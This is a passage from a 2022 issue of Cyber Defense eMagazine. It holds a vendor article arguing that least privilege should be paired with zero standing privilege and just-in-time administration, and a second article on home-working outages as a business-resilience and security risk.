stolen credentials and elevated privileges and, due to implicit trust between systems, the ease

of damaging lateral movement. According to Verizon’s 2021 DBIR report, 74% of cyber-attacks

are caused by privilege misuse or compromise, and for every cybersecurity team, that

administrative access sprawl and high risk of lateral movement pose as serious, everyday

threats to their resilience to cyberattacks.



To prevent lateral movement attacks resulting from stolen and misused privilege access,

information security teams are increasingly embracing the Principle of Least Privilege (PoLP),

which NIST defines as “the principle that users and programs should only have the necessary

privileges to complete their tasks.” It states that for any user or program that needs elevated

privileges to complete its task or function, IT teams must enable the least amount of privilege,

no more and no less, to get the job done. This directly emphasizes authorization -- meaning that

escalated user privileges must only be allowed to match the computing goals of the task at hand.

While the benefits of PoLP are obvious, there are several challenges that can often get in the

way of achieving them – whether due to the complexity of implementation or the inability to adapt

ingrained processes. For example, unlike Linux’s sudoers subsystem, Windows systems do not

provide granular controls for the tasks an administrative user can or cannot perform. Group

Policies also only go so far, especially since interactions between multiple policies may negate

affects to achieve granular control. It’s actually quite common for an enterprise’s Active Directory

to have Nested Groups, Domain Admins and Backup Admins, and all other privilege groups

containing broad, obfuscated and over-permissioned configurations that either contradict or

cancel out any least privileged controls in place.

One of the biggest issues with PoLP is that time is not explicitly called out as a privilege, and

thus is simply not considered at all when conferring least privileges. Let’s go back to the alwayson,

always-available administrative access, but now, the access is constrained to the least

computing privileges required for the task at hand. The fact that all systems have standing

privileges defeats the goal of granular control, because an administrator on one system labeled

trustworthy can, per convenience or with malintent, administer all other systems they have

standing privileges on, effectively making the principle of least privilege null and void.

The first step in addressing time is through what Gartner calls Zero Standing Privilege (ZSP), or

the removal of all standing privileges and the implementation of Just-In-Time administration

(JITA). First, ZSP removes the privilege sprawl. Then, JITA, bolstered by multi-factor

authentication (MFA), selectively elevates privileges to the specific system that requires

attention, exactly when the administration is needed, and for just the right amount of time

necessary to complete the task. If cyber thieves (or insiders) were to get a foothold on a system,

the window of opportunity to steal admin credentials would be significantly narrowed, and most

importantly, they wouldn’t find a plethora of administrative access available to exploit and use to

move laterally within the organization.



By combing the Principle of Least Privilege with Zero Standing Privilege and Just-In-Time

administration, companies ensure:

• Measurable reduction of attack surfaces by reducing privilege sprawl, making it less likely,

if not impossible, to hack additional privileged credentials

• The prevention of lateral movement, due to the absence of persistent admin accounts on

other systems; if a privilege credential attack does occur, it is contained to a single system

• Further reduction of risk by using MFA and on-demand, real-time provisioning and

deprovisioning of access as and when required for the task at hand

• Protection from insider threats by reducing the likelihood and impact of employee

negligence or intended error by leveraging unnecessary access

• More effective incident response actions by removing admin accounts during an event,

stopping any ongoing incident from installing malware on other systems or proliferating

on the network

• Collectively, these benefits enable governance of privilege and increase maturation

toward Zero Trust

While the Principle of Least Privilege is an important starting point for organizations, it remains

incomplete or is weakened by ignoring the element of time. The practice of Zero Standing

Privilege and Just-In-Time administration adds the time-based protective layer companies need

at entry points and to prevent lateral movement malicious actors use to readily attack and breach

their systems today.

About the Author

Raj Dodhiawala, President, Remediant, Inc. Raj Dodhiawala

has over 30 years of experience in enterprise software and

cybersecurity, primarily focused on bringing disruptive

enterprise products to new markets. Currently serving as

President of Remediant, he is bringing focus, agility and

collaboration across sales, marketing, finance and operations

and leading the company through its next phase of growth.

Raj Dodhiawala can be reached online (LinkedIn,) and at our

company website, https://www.remediant.com



Redefining Resilience in The New World of Work

By Andrew Lawton, CEO of Reskube Ltd

We are entering a new world of work. The Covid-19 pandemic has accelerated the move towards hybrid

and remote working which was already gaining momentum before the world went into lockdown. From

one-man-bands to international institutions, workplace and home boundaries have begun to disintegrate.

From Wall Street to Hong Kong to the City of London, traders are now investing millions of dollars and

making complex financial decisions from their homes. Equally, lawyers, journalists, broadcasters, and

workforces across pretty much every sector have had to adjust to forced changes in the way they work,

and are now doing critical work remotely.

Even though pandemic restrictions worldwide are easing, home working – either as part of a fully remote

or hybrid model – is here to stay. But while the likes of monitors, keyboards, stable internet and power

connection, and IT infrastructures were all material mainstays in an office environment, recreating this in

our own homes is less straightforward. This represents a risk to business everywhere.



New risks

The scale of this problem is eye-opening. Research by Reskube has found that 64% of people in the UK

who have worked from home in the last year have suffered from an internet or power outage in that time.

That equates to an estimated 12 million people. Of that, we are finding that 5% of home workers in the

UK are doing time critical or high value work. That equates to roughly 470 million hours a year where any

sort of outage would have a severe impact.

The vast majority of home workers do not currently have a setup that is comparable to their office

environment. This exposes them to potential security risks as they seek other forms of connection to

continue working during an outage. This may include connecting to unstable and unvalidated Wi-Fi

sources.

Consider a critical worker who is working from home. Imagine that their Wi-Fi connection goes down and

they are either unable to perform their job, or forced to rely on an unsecure connection to continue. This

could not only have severe knock-on effects for their productivity, but also representing operational,

financial, and potentially regulatory risks to the business if security is compromised.

For IT teams, managing disparate hybrid workforces is proving enough of a challenge as is. These issues

on top are a further headache they could do without.

What needs to be done?

Working from home is here to stay, meaning that businesses face growing risks to their operations as

power and network outages threaten critical and day-to-day work.

Up until now, ensuring security and resilience for remote workers has tended to be an afterthought, or

something that only comes to attention following an outage or security breach. This need not and should

not be the case.

A home resilience solution is essential for businesses where workers are undertaking time and mission

critical work at home, as well as those who rely on a seamless connection for productivity and IT security.

Alongside laptop, phone and broadband, now is the time for businesses to look at implementing new

measures to guarantee connectivity for remote workers. This will enable them to take back control of their

productivity and deliver their best work, uninterrupted.

The good news is there are solutions available on the market today. Adopting such a solution will reduce

the risk of interruptions to the delivery of critical business services or of cybersecurity breaches that could

negatively impact organizations financially, operationally or reputationally. At the same time, it can also

boost productivity and wellbeing across the wider hybrid workforce. I urge businesses and individuals to

explore resilient solutions to minimize the risk to their operations from the new world of remote work.



About the Author

Andrew Lawton is CEO of Reskube Ltd. Andrew has

successfully built and lead businesses for 25 years, with senior

positions held at large companies such as HP and IBM, as well

as smaller, fast growing companies including Safetynet,

Guardian and Internet Security Systems (ISS).

Andrew has a passion for leading high-growth technology

businesses in the B2B Services, Software, IT, networking,

telecom, and internet security industries, as well as a strong

track-record for launching new business initiatives and

organisations resulting in aggressive growth.

Andrew Lawton can be reached online here and at the Reskube

company website https://reskube.com/.

















































CyberDefense.TV now has 200 hotseat interviews and growing…

Market leaders, innovators, CEO hot seat interviews and much more.

A division of Cyber Defense Media Group and sister to Cyber Defense Magazine.



Free Monthly Cyber Defense eMagazine Via Email

Enjoy our monthly electronic editions of our Magazines for FREE.

This magazine is by and for ethical information security professionals with a twist on innovative consumer

products and privacy issues on top of best practices for IT security and Regulatory Compliance. Our

mission is to share cutting edge knowledge, real world stories and independent lab reviews on the best

ideas, products and services in the information technology industry. Our monthly Cyber Defense e-

Magazines will also keep you up to speed on what’s happening in the cyber-crime and cyber warfare

arena plus we’ll inform you as next generation and innovative technology vendors have news worthy of

sharing with you – so enjoy. You get all of this for FREE, always, for our electronic editions. Click here

to sign up today and within moments, you’ll receive your first email from us with an archive of our

newsletters along with this month’s newsletter.

By signing up, you’ll always be in the loop with CDM.

Copyright (C) 2022, Cyber Defense Magazine, a division of CYBER DEFENSE MEDIA GROUP (STEVEN G.

SAMUELS LLC. d/b/a) 276 Fifth Avenue, Suite 704, New York, NY 10001, Toll Free (USA): 1-833-844-9468 d/b/a

CyberDefenseAwards.com, CyberDefenseConferences.com, CyberDefenseMagazine.com,

CyberDefenseNewswire.com, CyberDefenseProfessionals.com, CyberDefenseRadio.com,and

CyberDefenseTV.com, is a Limited Liability Corporation (LLC) originally incorporated in the United States of

America. Our Tax ID (EIN) is: 45-4188465, Cyber Defense Magazine® is a registered trademark of Cyber

Defense Media Group. EIN: 454-18-8465, DUNS# 078358935. All rights reserved worldwide.


All rights reserved worldwide. Copyright © 2022, Cyber Defense Magazine. All rights reserved. No part of this

newsletter may be used or reproduced by any means, graphic, electronic, or mechanical, including photocopying,

recording, taping or by any information storage retrieval system without the written permission of the publisher

except in the case of brief quotations embodied in critical articles and reviews. Because of the dynamic nature of

the Internet, any Web addresses or links contained in this newsletter may have changed since publication and may

no longer be valid. The views expressed in this work are solely those of the author and do not necessarily reflect

the views of the publisher, and the publisher hereby disclaims any responsibility for them. Send us great content

and we’ll post it in the magazine for free, subject to editorial approval and layout. Email us at



276 Fifth Avenue, Suite 704, New York, NY 1000

EIN: 454-18-8465, DUNS# 078358935.

All rights reserved worldwide.


www.cyberdefensemagazine.com

NEW YORK (US HQ), LONDON (UK/EU), HONG KONG (ASIA)

Cyber Defense Magazine - Cyber Defense eMagazine rev. date: 03/01/2022



Books by our Publisher: https://www.amazon.com/Cryptoconomy-Bitcoins-Blockchains-Bad-Guys-ebook/dp/B07KPNS9NH

(with others coming soon...)

10 Years in The Making…

Thank You to our Loyal Subscribers!

We've Completely Rebuilt CyberDefenseMagazine.com - Please Let Us Know What You Think. It's mobile

and tablet friendly and superfast. We hope you like it. In addition, we're past the five nines of 7x24x365

uptime as we continue to scale with improved Web App Firewalls, Content Deliver Networks (CDNs)

around the Globe, Faster and More Secure DNS and CyberDefenseMagazine.com up and running as an

array of live mirror sites and our new B2C consumer magazine CyberSecurityMagazine.com. Millions of

monthly readers and new platforms coming…starting with www.cyberdefenseconferences.com this

month…









Cyber Defense eMagazine March Edition for 2022

Create successful ePaper yourself

Delete template?

Save as template?